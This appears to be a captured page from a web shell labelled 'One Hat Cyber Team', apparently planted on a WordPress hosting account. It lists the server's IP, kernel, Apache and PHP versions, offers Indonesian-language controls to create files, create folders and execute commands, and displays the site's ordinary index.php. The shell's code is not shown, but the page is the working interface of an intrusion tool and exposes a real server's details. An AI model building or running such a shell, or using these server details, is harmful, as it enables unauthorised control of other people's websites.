One Hat Cyber Team
Your IP :
216.73.217.11
Server IP :
129.121.77.250
Server :
Linux server.choicemg.com 5.14.0-687.31.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Sat Aug 1 05:38:01 EDT 2026 x86_64
Server Software :
Apache
PHP Version :
8.2.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
choicemg
/
public_html
/
View File Name :
index.php
<?php /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define( 'WP_USE_THEMES', true ); /** Loads the WordPress Environment and Template */ require __DIR__ . '/wp-blog-header.php';